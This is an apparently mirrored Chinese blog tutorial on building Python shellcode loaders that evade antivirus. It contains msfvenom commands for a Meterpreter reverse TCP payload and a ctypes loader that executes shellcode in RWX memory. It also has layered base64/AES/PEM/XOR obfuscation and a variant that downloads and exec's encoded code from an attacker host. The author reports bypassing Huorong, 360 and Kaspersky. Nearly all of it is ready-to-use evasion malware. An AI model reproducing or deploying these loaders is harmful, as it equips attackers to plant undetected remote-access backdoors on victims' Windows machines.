首页 > 系统相关 >python加载shellcode免杀

python加载shellcode免杀

时间:2023-10-12 22:44:24浏览次数:38  
标签:return 免杀 python base64 ctypes import shellcode def

1、第一个shellcode加载器

import ctypes


# msf生成的shellcode,命令:msfvenom -e x64/xor_dynamic -i 16 -p windows/x64/meterpreter_reverse_tcp lhost=192.168.111.111 lport=80 -f py -o shell.py
buf =  b""
buf += b"\xeb\x27\x5b\x53\x5f\xb0\xe7\xfc\xae\x75\xfd\x57"
#-------shellcode省略-------


#以下为shellcode加载器
ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_uint64
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(buf), 0x3000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(rwxpage), ctypes.create_string_buffer(buf), len(buf))
handle = ctypes.windll.kernel32.CreateThread(0, 0, ctypes.c_uint64(rwxpage), 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

2、python加载shellcode免杀

  • 利用msf生成shellcode

    msfvenom -e x64/xor_dynamic -i 16 -p windows/x64/meterpreter_reverse_tcp lhost=192.168.111.111 lport=80 -f py -o shell.py
    
  • 编码,生成混淆后的shellcode和加载器

    import base64
    import binascii
    import ctypes
    from Crypto.Cipher import AES
    from Crypto.Util.Padding import pad, unpad
    from Crypto.IO import PEM
    
    
    # msf生成的shellcode,命令:msfvenom -e x64/xor_dynamic -i 16 -p windows/x64/meterpreter_reverse_tcp lhost=192.168.111.111 lport=80 -f py -o shell.py
    buf =  b""
    buf += b"\xeb\x27\x5b\x53\x5f\xb0\xe7\xfc\xae\x75\xfd\x57"
    #-------shellcode省略-------
    
    
    # shellcode加载器,这里用byte类型方便base64编码
    shell_loader = b'''
    ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_uint64
    rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(buf), 0x3000, 0x40)
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(rwxpage), ctypes.create_string_buffer(buf), len(buf))
    handle = ctypes.windll.kernel32.CreateThread(0, 0, ctypes.c_uint64(rwxpage), 0, 0, 0)
    ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
    '''
    
    
    key = b'4d65017f65d72aada5d1ab08d5c4bd18'       # 参数key: 秘钥,要求是bytes类型,并且长度必须是16、24或32 bytes,因为秘钥的长度可以为:128位、192位、256位
    iv = b'7d2d3e0bb1642d52'                        #初始化向量,第一组明文就是用它加密
    
    def aes_encode(shellcode):
        a = AES.new(key, AES.MODE_CBC, iv)          # 创建用于加密的AES对象  AES.new(密钥, 加密模式, 初始化向量)
    
        b = a.encrypt(pad(shellcode, 32))           # 使用对象进行加密,加密的时候,需要使用pad对数据进行填充,因为加密的数据要求必须是能被128整除
                                                    # pad参数内容,第一个是待填充的数据,第二个是填充成多大的数据,需要填充成256位即32bytes
        return binascii.b2a_hex(b)                  # 将加密后的结果(二进制)转换成十六进制的或者其它形式
    
    
    def b_to_a(shellcode):
        return binascii.b2a_hex(shellcode)          # 将字节类型转换为字符串
    
    
    def b64_encode(shellcode):
        return base64.b64encode(shellcode)          # base64编码
    
    def PEM_encode(shellcode):
        shellcode = PEM.encode(shellcode, '', passphrase=b'shellcode')     #PEM加密,PEM.encode(需要加密的数据, 指定名称这里为空, passphrase:指定密钥)
        return shellcode
    
    
    def shellcode_xor(shellcode):                   # 异或变形
        xor_code = ''								#空字符串方便异或后拼接
        for i in shellcode:
            i = ord(i) ^ 678						#把每个字符转成ASCII值与678进行异或
            xor_code += str(i) + '_'				#异或后的每个字符使用 _ 进行拼接
        return xor_code[:-1]						#去除掉最后一个 _
    
    
    def shellcode_encode(shellcode):
        return shellcode_xor(PEM_encode(aes_encode(b64_encode(b_to_a(shellcode)))))          # 对shellcode进行处理 转换为字符串 -> base64编码 -> aes加密 -> PEM加密 -> 异或 -> 最终结果'739_744_736_738_752_764_749_717_721_704_.......'
    
    
    def main(shellcode):
        return (shellcode_encode(shellcode), base64.b64encode(shell_loader[::-1]))            # 返回值为元组 (混淆后的shellcode, 加载器先反转再base64编码)
    
    
    if __name__ == '__main__':
        shellcode, shell_loader = main(buf)       # buf为msf生成的shellcode
        print(shellcode)                        # 混淆后的shellcode
        print(shell_loader)                       # 加载器先反转再base64编码得到的结果
    
  • 加载器

    import base64
    import binascii
    import ctypes
    from Crypto.Cipher import AES
    from Crypto.Util.Padding import pad, unpad
    from Crypto.IO import PEM
    
    #混淆后的shellcode
    shellcode = '651_651_651_651_651_740_739_737_751_744_646_651_651_651_651_651_684_758_724_713_709_651_
    
    混淆后的加载器
    shell_load = b'CikxLSAsZWxkbmFoKHRjZWpiT2VsZ25pU3JvRnRpYVcuMjNsZW5yZWsubGxkbml3LnNlcHl0YwopMCAsMCAsMCAsKWVnYXB4d3IoNDZ0bml1X2Muc2VweXRjICwwICwwKGRhZXJoVGV0YWVyQy4yM2xlbnJlay5sbGRuaXcuc2VweXRjID0gZWxkbmFoCikpZnViKG5lbCAsKWZ1YihyZWZmdWJfZ25pcnRzX2V0YWVyYy5zZXB5dGMgLCllZ2FweHdyKDQ2dG5pdV9jLnNlcHl0Yyh5cm9tZU1ldm9NbHRSLjIzbGVucmVrLmxsZG5pdy5zZXB5dGMKKTA0eDAgLDAwMDN4MCAsKWZ1YihuZWwgLDAoY29sbEFsYXV0cmlWLjIzbGVucmVrLmxsZG5pdy5zZXB5dGMgPSBlZ2FweHdyCjQ2dG5pdV9jLnNlcHl0Yz1lcHl0c2VyLmNvbGxBbGF1dHJpVi4yM2xlbnJlay5sbGRuaXcuc2VweXRjCg=='
    
    key = b'4d65017f65d72aada5d1ab08d5c4bd18'
    iv = b'7d2d3e0bb1642d52'
    
    def aes_decode(shellcode):
        a = AES.new(key, AES.MODE_CBC, iv)
        shellcode = binascii.a2b_hex(shellcode)
        shellcode = unpad(a.decrypt(shellcode), 32)
        return shellcode
    
    def a_to_b(shellcode):
        return binascii.a2b_hex(shellcode)
    
    def b64decode(shellcode):
        return base64.b64decode(shellcode)
    
    def PEM_decode(shellcode):
        shellcode = PEM.decode(shellcode, passphrase=b'shellcode')
        return shellcode
    
    def shellcode_xor_decode(shellcode):
        shellcode = shellcode.split('_')
        xor_code = ''
        for i in shellcode:
            i = int(i) ^ 678
            xor_code += chr(i)
        return xor_code
    
    def main():
        return a_to_b(b64decode(aes_decode(PEM_decode(shellcode_xor_decode(shellcode))[0])))
    
    if __name__ == '__main__':
        buf = main()
        exec(base64.b64decode(shell_load)[::-1])
    
    • pyinstaller进行打包(打包前删除所有注释)

      pyinstaller.exe -F -w C:\demo_load.py
      
  • 测试结果

    • VIRUSTOTAL:https://www.virustotal.com/gui/home/upload

      image

    • 微步在线:https://s.threatbook.com/

      image

    • 可以过火绒静态和动态特征正常上线,但无法过360和卡巴斯基

      image

3、网络分离

  • 编码,生成混淆后的shellcode和加载器,写入文件a.txt

    import base64
    import binascii
    import ctypes
    from Crypto.Cipher import AES
    from Crypto.Util.Padding import pad, unpad
    from Crypto.IO import PEM
    
    
    # msf生成的shellcode,命令:msfvenom -e x64/xor_dynamic -i 16 -p windows/x64/meterpreter_reverse_tcp lhost=192.168.111.111 lport=80 -f py -o shell.py
    buf =  b""
    buf += b"\xeb\x27\x5b\x53\x5f\xb0\xe7\xfc\xae\x75\xfd\x57"
    #-------shellcode省略-------
    
    
    # shellcode加载器
    shell_loader = b'''
    ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_uint64
    rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(buf), 0x3000, 0x40)
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(rwxpage), ctypes.create_string_buffer(buf), len(buf))
    handle = ctypes.windll.kernel32.CreateThread(0, 0, ctypes.c_uint64(rwxpage), 0, 0, 0)
    ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
    '''
    
    
    key = b'4d65017f65d72aada5d1ab08d5c4bd18'       # 参数key: 秘钥,要求是bytes类型,并且长度必须是16、24或32 bytes,因为秘钥的长度可以为:128位、192位、256位
    iv = b'7d2d3e0bb1642d52'                        #初始化向量,第一组明文就是用它加密
    
    def aes_encode(shellcode):
        a = AES.new(key, AES.MODE_CBC, iv)          # 创建用于加密的AES对象  AES.new(密钥, 加密模式, 初始化向量)
    
        b = a.encrypt(pad(shellcode, 32))           # 使用对象进行加密,加密的时候,需要使用pad对数据进行填充,因为加密的数据要求必须是能被128整除
                                                    # pad参数内容,第一个是待填充的数据,第二个是填充成多大的数据,需要填充成256位即32bytes
        return binascii.b2a_hex(b)                  # 将加密后的结果(二进制)转换成十六进制的或者其它形式
    
    
    def b_to_a(shellcode):
        return binascii.b2a_hex(shellcode)          # 将字节类型转换为字符串
    
    
    def b64_encode(shellcode):
        return base64.b64encode(shellcode)          # base64编码
    
    def PEM_encode(shellcode):
        shellcode = PEM.encode(shellcode, '', passphrase=b'shellcode')     #PEM加密,PEM.encode(需要加密的数据, 指定名称这里为空, passphrase:指定密钥)
        return shellcode
    
    
    def shellcode_xor(shellcode):                   # 异或变形
        xor_code = ''								#空字符串方便异或后拼接
        for i in shellcode:
            i = ord(i) ^ 678						#把每个字符转成ASCII值与678进行异或
            xor_code += str(i) + '_'				#异或后的每个字符使用 _ 进行拼接
        return xor_code[:-1]						#去除掉最后一个 _
    
    
    def shellcode_encode(shellcode):
        return shellcode_xor(PEM_encode(aes_encode(b64_encode(b_to_a(shellcode)))))          # 对shellcode进行处理 转换为字符串 -> base64编码 -> aes加密 -> PEM加密 -> 异或 -> 最终结果'739_744_736_738_752_764_749_717_721_704_.......'
    
    
    def main(shellcode):
        return (shellcode_encode(shellcode), base64.b64encode(shell_loader[::-1]))            # 返回值为元组 (混淆后的shellcode, 加载器先反转再base64编码)
    
    
    if __name__ == '__main__':
        shellcode, shell_loader = main(buf)       # buf为msf生成的shellcode
        with open('a.txt', mode='w') as f1:		  #混淆后的shellcode写入a.txt文件中
            f1.write(shellcode)
    
  • 对加载器进行编码写入文件b.txt

    test = b'''
    import base64
    import binascii
    import ctypes
    from Crypto.Cipher import AES
    from Crypto.Util.Padding import pad, unpad
    from Crypto.IO import PEM
    
    shell_load = b'CikxLSAsZWxkbmFoKHRjZWpiT2VsZ25pU3JvRnRpYVcuMjNsZW5yZWsubGxkbml3LnNlcHl0YwopMCAsMCAsMCAsKWVnYXB4d3IoNDZ0bml1X2Muc2VweXRjICwwICwwKGRhZXJoVGV0YWVyQy4yM2xlbnJlay5sbGRuaXcuc2VweXRjID0gZWxkbmFoCikpZnViKG5lbCAsKWZ1YihyZWZmdWJfZ25pcnRzX2V0YWVyYy5zZXB5dGMgLCllZ2FweHdyKDQ2dG5pdV9jLnNlcHl0Yyh5cm9tZU1ldm9NbHRSLjIzbGVucmVrLmxsZG5pdy5zZXB5dGMKKTA0eDAgLDAwMDN4MCAsKWZ1YihuZWwgLDAoY29sbEFsYXV0cmlWLjIzbGVucmVrLmxsZG5pdy5zZXB5dGMgPSBlZ2FweHdyCjQ2dG5pdV9jLnNlcHl0Yz1lcHl0c2VyLmNvbGxBbGF1dHJpVi4yM2xlbnJlay5sbGRuaXcuc2VweXRjCg=='
    
    key = b'4d65017f65d72aada5d1ab08d5c4bd18'
    iv = b'7d2d3e0bb1642d52'
    
    def aes_decode(shellcode):
        a = AES.new(key, AES.MODE_CBC, iv)
        shellcode = binascii.a2b_hex(shellcode)
        shellcode = unpad(a.decrypt(shellcode), 32)
        return shellcode
    
    def a_to_b(shellcode):
        return binascii.a2b_hex(shellcode)
    
    def b64decode(shellcode):
        return base64.b64decode(shellcode)
    
    def PEM_decode(shellcode):
        shellcode = PEM.decode(shellcode, passphrase=b'shellcode')
        return shellcode
    
    def shellcode_xor_decode(shellcode):
        shellcode = shellcode.split('_')
        xor_code = ''
        for i in shellcode:
            i = int(i) ^ 678
            xor_code += chr(i)
        return xor_code
    
    def main(shellcode):
        return a_to_b(b64decode(aes_decode(PEM_decode(shellcode_xor_decode(shellcode))[0])))
        
    buf = main(buf)
    exec(base64.b64decode(shell_load)[::-1])
    '''
    b = base64.b64encode(test[::-1])
    with open('b.txt', mode='w') as f1:
        f1.write(b)
    
  • 将加密和编码后的shellcode和加载器代码通过网络下载

    import requests
    import base64
    import binascii
    import ctypes
    from Crypto.Cipher import AES
    from Crypto.Util.Padding import pad, unpad
    from Crypto.IO import PEM
    
    
    a = requests.get('http://192.168.111.111:8000/a.txt')
    buf = a.text
    
    b = requests.get('http://192.168.111.111:8000/b.txt')
    exec(base64.b64decode(b.content)[::-1].decode())
    
    • pyinstaller进行打包(打包前删除所有注释)

      pyinstaller.exe -F -w C:\request_load.py
      
  • 测试结果

    • VIRUSTOTAL:https://www.virustotal.com/gui/home/upload

      image

    • 微步在线:https://s.threatbook.com/

      image

    • 可以过火绒静态和动态特征正常上线

      image

    • 可以过360静态和动态特征正常上线

      image

    • 无法过卡巴斯基

4、本地分离

  • 把编码后的shellcode保存到a.txt中

    import base64
    import binascii
    import ctypes
    from Crypto.Cipher import AES
    from Crypto.Util.Padding import pad, unpad
    from Crypto.IO import PEM
    
    
    # msf生成的shellcode,命令:msfvenom -e x64/xor_dynamic -i 16 -p windows/x64/meterpreter_reverse_tcp lhost=192.168.111.111 lport=80 -f py -o shell.py
    buf =  b""
    buf += b"\xeb\x27\x5b\x53\x5f\xb0\xe7\xfc\xae\x75\xfd\x57"
    #-------shellcode省略-------
    
    
    # shellcode加载器
    shell_loader = b'''
    ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_uint64
    rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(buf), 0x3000, 0x40)
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(rwxpage), ctypes.create_string_buffer(buf), len(buf))
    handle = ctypes.windll.kernel32.CreateThread(0, 0, ctypes.c_uint64(rwxpage), 0, 0, 0)
    ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
    '''
    
    
    key = b'4d65017f65d72aada5d1ab08d5c4bd18'       # 参数key: 秘钥,要求是bytes类型,并且长度必须是16、24或32 bytes,因为秘钥的长度可以为:128位、192位、256位
    iv = b'7d2d3e0bb1642d52'                        #初始化向量,第一组明文就是用它加密
    
    def aes_encode(shellcode):
        a = AES.new(key, AES.MODE_CBC, iv)          # 创建用于加密的AES对象  AES.new(密钥, 加密模式, 初始化向量)
    
        b = a.encrypt(pad(shellcode, 32))           # 使用对象进行加密,加密的时候,需要使用pad对数据进行填充,因为加密的数据要求必须是能被128整除
                                                    # pad参数内容,第一个是待填充的数据,第二个是填充成多大的数据,需要填充成256位即32bytes
        return binascii.b2a_hex(b)                  # 将加密后的结果(二进制)转换成十六进制的或者其它形式
    
    
    def b_to_a(shellcode):
        return binascii.b2a_hex(shellcode)          # 将字节类型转换为字符串
    
    
    def b64_encode(shellcode):
        return base64.b64encode(shellcode)          # base64编码
    
    def PEM_encode(shellcode):
        shellcode = PEM.encode(shellcode, '', passphrase=b'shellcode')     #PEM加密,PEM.encode(需要加密的数据, 指定名称这里为空, passphrase:指定密钥)
        return shellcode
    
    
    def shellcode_xor(shellcode):                   # 异或变形
        xor_code = ''								#空字符串方便异或后拼接
        for i in shellcode:
            i = ord(i) ^ 678						#把每个字符转成ASCII值与678进行异或
            xor_code += str(i) + '_'				#异或后的每个字符使用 _ 进行拼接
        return xor_code[:-1]						#去除掉最后一个 _
    
    
    def shellcode_encode(shellcode):
        return shellcode_xor(PEM_encode(aes_encode(b64_encode(b_to_a(shellcode)))))          # 对shellcode进行处理 转换为字符串 -> base64编码 -> aes加密 -> PEM加密 -> 异或 -> 最终结果'739_744_736_738_752_764_749_717_721_704_.......'
    
    
    def main(shellcode):
        return (shellcode_encode(shellcode), base64.b64encode(shell_loader[::-1]))            # 返回值为元组 (混淆后的shellcode, 加载器先反转再base64编码)
    
    
    if __name__ == '__main__':
        shellcode, shell_loader = main(buf)       # buf为msf生成的shellcode
        with open('a.txt', mode='w') as f1:		  #混淆后的shellcode写入a.txt文件中
            f1.write(shellcode)
    
  • 对加载器进行编码

    test = b'''
    import base64
    import binascii
    import ctypes
    from Crypto.Cipher import AES
    from Crypto.Util.Padding import pad, unpad
    from Crypto.IO import PEM
    
    shell_load = b'CikxLSAsZWxkbmFoKHRjZWpiT2VsZ25pU3JvRnRpYVcuMjNsZW5yZWsubGxkbml3LnNlcHl0YwopMCAsMCAsMCAsKWVnYXB4d3IoNDZ0bml1X2Muc2VweXRjICwwICwwKGRhZXJoVGV0YWVyQy4yM2xlbnJlay5sbGRuaXcuc2VweXRjID0gZWxkbmFoCikpZnViKG5lbCAsKWZ1YihyZWZmdWJfZ25pcnRzX2V0YWVyYy5zZXB5dGMgLCllZ2FweHdyKDQ2dG5pdV9jLnNlcHl0Yyh5cm9tZU1ldm9NbHRSLjIzbGVucmVrLmxsZG5pdy5zZXB5dGMKKTA0eDAgLDAwMDN4MCAsKWZ1YihuZWwgLDAoY29sbEFsYXV0cmlWLjIzbGVucmVrLmxsZG5pdy5zZXB5dGMgPSBlZ2FweHdyCjQ2dG5pdV9jLnNlcHl0Yz1lcHl0c2VyLmNvbGxBbGF1dHJpVi4yM2xlbnJlay5sbGRuaXcuc2VweXRjCg=='
    
    key = b'4d65017f65d72aada5d1ab08d5c4bd18'
    iv = b'7d2d3e0bb1642d52'
    
    def aes_decode(shellcode):
        a = AES.new(key, AES.MODE_CBC, iv)
        shellcode = binascii.a2b_hex(shellcode)
        shellcode = unpad(a.decrypt(shellcode), 32)
        return shellcode
    
    def a_to_b(shellcode):
        return binascii.a2b_hex(shellcode)
    
    def b64decode(shellcode):
        return base64.b64decode(shellcode)
    
    def PEM_decode(shellcode):
        shellcode = PEM.decode(shellcode, passphrase=b'shellcode')
        return shellcode
    
    def shellcode_xor_decode(shellcode):
        shellcode = shellcode.split('_')
        xor_code = ''
        for i in shellcode:
            i = int(i) ^ 678
            xor_code += chr(i)
        return xor_code
    
    def main(shellcode):
        return a_to_b(b64decode(aes_decode(PEM_decode(shellcode_xor_decode(shellcode))[0])))
    
    
    with open('./a.txt', mode='r') as f1:			#读取保存到a.txt中的shellcode
        buf = main(f1.read())						#对shellcode进行解码
        exec(base64.b64decode(shell_load)[::-1])	#利用加载器执行shellcode
    '''
    b = base64.b64encode(test[::-1])	#先反转再base64编码
    print(b)
    
  • 最终的加载器,执行之前a.txt要在同一级目录

    import base64
    import binascii
    import ctypes
    from Crypto.Cipher import AES
    from Crypto.Util.Padding import pad, unpad
    from Crypto.IO import PEM
    
    
    shell_loader = b'CildMS06OlspZGFvbF9sbGVocyhlZG9jZWQ0NmIuNDZlc2FiKGNleGUgICAgCikpKGRhZXIuMWYobmlhbSA9IGZ1YiAgICAKOjFmIHNhICkncic9ZWRvbSAsJ3R4dC5hLy4nKG5lcG8gaHRpdwoKCikpKV0wWykpZWRvY2xsZWhzKGVkb2NlZF9yb3hfZWRvY2xsZWhzKGVkb2NlZF9NRVAoZWRvY2VkX3NlYShlZG9jZWQ0NmIoYl9vdF9hIG5ydXRlciAgICAKOillZG9jbGxlaHMobmlhbSBmZWQKCmVkb2Nfcm94IG5ydXRlciAgICAKKWkocmhjID0rIGVkb2Nfcm94ICAgICAgICAKODc2IF4gKWkodG5pID0gaSAgICAgICAgCjplZG9jbGxlaHMgbmkgaSByb2YgICAgCicnID0gZWRvY19yb3ggICAgCiknXycodGlscHMuZWRvY2xsZWhzID0gZWRvY2xsZWhzICAgIAo6KWVkb2NsbGVocyhlZG9jZWRfcm94X2Vkb2NsbGVocyBmZWQKCmVkb2NsbGVocyBucnV0ZXIgICAgCiknZWRvY2xsZWhzJ2I9ZXNhcmhwc3NhcCAsZWRvY2xsZWhzKGVkb2NlZC5NRVAgPSBlZG9jbGxlaHMgICAgCjopZWRvY2xsZWhzKGVkb2NlZF9NRVAgZmVkCgopZWRvY2xsZWhzKGVkb2NlZDQ2Yi40NmVzYWIgbnJ1dGVyICAgIAo6KWVkb2NsbGVocyhlZG9jZWQ0NmIgZmVkCgopZWRvY2xsZWhzKHhlaF9iMmEuaWljc2FuaWIgbnJ1dGVyICAgIAo6KWVkb2NsbGVocyhiX290X2EgZmVkCgplZG9jbGxlaHMgbnJ1dGVyICAgIAopMjMgLCllZG9jbGxlaHModHB5cmNlZC5hKGRhcG51ID0gZWRvY2xsZWhzICAgIAopZWRvY2xsZWhzKHhlaF9iMmEuaWljc2FuaWIgPSBlZG9jbGxlaHMgICAgCil2aSAsQ0JDX0VET00uU0VBICx5ZWsod2VuLlNFQSA9IGEgICAgCjopZWRvY2xsZWhzKGVkb2NlZF9zZWEgZmVkCgonMjVkMjQ2MWJiMGUzZDJkNydiID0gdmkKJzgxZGI0YzVkODBiYTFkNWFkYWEyN2Q1NmY3MTA1NmQ0J2IgPSB5ZWsKCic9PWdDalJYZXdWMmN1Y1hhdVJHYnM1eWFsSm5ibHgyTXk0aVZwSkhkMUZHYkJ4R2J2Tm1MeVYyYzBsSGNsMXpZMGxIY2xObkxqOVZkcDVHZDJRakN5ZEhld0YyWmxCU1BnTUdkNUJYWno1eWRwNUdac3htTHJWbWN1VkdieklqTFdsbWMwVlhZc0ZFYnM5MllvQURMZ3dXWnVoaVkxWldLc0FDTTRORE13QURMZ0FEZTBBVEtLTUdkNUJYWno1eWRwNUdac3htTHJWbWN1VkdieklqTFNSSGJOOW1kbDFVWnQ5bWM1aHlZMGxIY2xObkxqOVZkcDVHZDJRREt5ZEhld0YyWmxsQ0xnTUdkNUJYWno1eVl5VldZMFYyWHpSbmNwNTJaZkpXZG1aV1p5aGlZMVpXS3NBQ2JsNUdLaVZuWnBraUNvRm1ia3hXWmcwRElqUlhld1YyY3VjWGF1UkdiczV5YWxKbmJseDJNeTR5UXlWV1kwVkdWb0pYWmhSR0t3d0NJd3dDSWpSWGV3VjJjdU0yWDFsbWIwWkROb0kzZDRCWFluVldLc0FDTXNBQ01zQUNNcG93WTBsSGNsTm5MM2xtYmt4R2J1c1daeTVXWnNOak11Y1ZZcFJuUnZKM1VwNTJac1YyVGlwV1pqUkhLb0ZtYmt4V1pzQVNMeGtpQydiID0gZGFvbF9sbGVocwoKTUVQIHRyb3BtaSBPSS5vdHB5ckMgbW9yZgpkYXBudSAsZGFwIHRyb3BtaSBnbmlkZGFQLmxpdFUub3RweXJDIG1vcmYKU0VBIHRyb3BtaSByZWhwaUMub3RweXJDIG1vcmYKc2VweXRjIHRyb3BtaQppaWNzYW5pYiB0cm9wbWkKNDZlc2FiIHRyb3BtaQo='
    exec(base64.b64decode(shellcode_loader)[::-1])
    
    • pyinstaller进行打包(打包前删除所有注释)

      pyinstaller.exe -F -w C:\a.py
      
  • 测试结果

    • VIRUSTOTAL:https://www.virustotal.com/gui/home/upload

      image

    • 微步在线:https://s.threatbook.com/

      image

    • 可以过火绒静态和动态特征正常上线

      image

    • 可以过360静态和动态特征正常上线

      image

      image

    • 可以过卡巴斯基静态和动态特征正常上线(这里使用的payload为windows/x64/meterpreter_reverse_tcp,如果使用windows/x64/meterpreter/reverse_tcp,会被卡巴斯基反网络攻击拦截无法上线)

      image

标签:return,免杀,python,base64,ctypes,import,shellcode,def
From: https://www.cnblogs.com/ctostm/p/17760799.html

相关文章

  • Python 集合(Sets)2
    访问项您无法通过引用索引或键来访问集合中的项。但是,您可以使用for循环遍历集合项,或者使用in关键字检查集合中是否存在指定的值。示例,遍历集合并打印值:thisset={"apple","banana","cherry"}forxinthisset:print(x)示例,检查集合中是否存在"banana":thisset={"......
  • 代码随想录训练营的第二天(Python)| 977.有序数组的平方、209.长度最小的子数组
    977.有序数组的平方暴力求解(O(n+logn))classSolution:defsortedSquares(self,nums:List[int])->List[int]:returnsorted(i**2foriinnums)双指针(O(n))由于列表是单调递增的,元素平方后的最大值要么在最前面,要么在最后面classSolution:defsort......
  • 笨办法学Python3 习题33 while 循环
    while循环只要循环语句中的条件布尔值为True,就会不停的执行下面的代码块命令。while循环是无边界循环,forin循环是有边界循环和if语句的相似点都是检查一个布尔表达式的真假,if语句是执行一次,while循环是执行完跳回到while顶部,如此重复,直到布尔值为假False尽量少用w......
  • Python中的迭代器与生成器
    迭代:迭代是Python最强大的功能之一,是访问集合元素的一种方式。迭代器:迭代器是一个可以记住遍历的位置的对象。迭代器对象从集合的第一个元素开始访问,直到所有的元素被访问完结束。迭代器只能往前不会后退。迭代器有两个基本的方法:iter()和next()。字符串,列表或元组对象都......
  • 2023.10.12python练习关于函数
    #让20以内的奇数写入函数里然后输出三遍defnumber():a=-1whilea<19:a+=2print(a,end="")b=1whileb<=3:b+=1number()print()#输出5次20以内的奇数并输出5次9*9乘法表,都写入一个函数里defwww():x,y=1,1z=......
  • python 删除es指定字段数据
    需求:删除es中指定IP相关的数据(remoteAddr:ip)日志格式fields.product:wantwords_zxxxx_feature@timestamp:Oct12,2023@18:56:39.000date_timeLocal:12/Oct/2023:18:56:39+0800ecs.version:1.12.0host.name:WebServer-ZJK-1httpReferer:https:/xxx/httpUserAge......
  • Cython加密python代码防止反编译
    本方法适用于Linux环境下:1.安装库Cythonpip3installCython==3.0.0a10 2.编写待加密文件:hello.pyimportrandomdefac():i=random.randint(0,5)ifi>2:print('success')else:print('failure') 3.编写加密脚本import......
  • simulink中调用python脚本
      command='test.py&';%后轴&:等待调用结束(command='test.py';%无后轴&:立即执行下一句[status,cmdout]=system(command,'-echo');    参考:详解MATLAB的函数system()和shell转义字符“感叹号”,并利用它们实现在MATLAB中运行(调用)外部exe程序_matlabsy......
  • python 链表
    fromtypingimportOptionalclassListNode:def__init__(self,val=0,next=None):self.val=valself.next=nextclassSolution:defpartition(self,head:Optional[ListNode],x:int)->Optional[ListNode]:lessListPre......
  • 【Python】FastAPI 使用python3.6+构建API的Web框架
    现代、快速(高性能)的Web框架,用于构建基于Python的 API;基于Starlette和Pydantic库构建而成官网:https://fastapi.tiangolo.com/ 1、安装#对于生产环境,还需要一个ASGI服务器,如Uvicorn或Hypercorn#>pipinstall"uvicorn[standard]"pipinstallfastapipipi......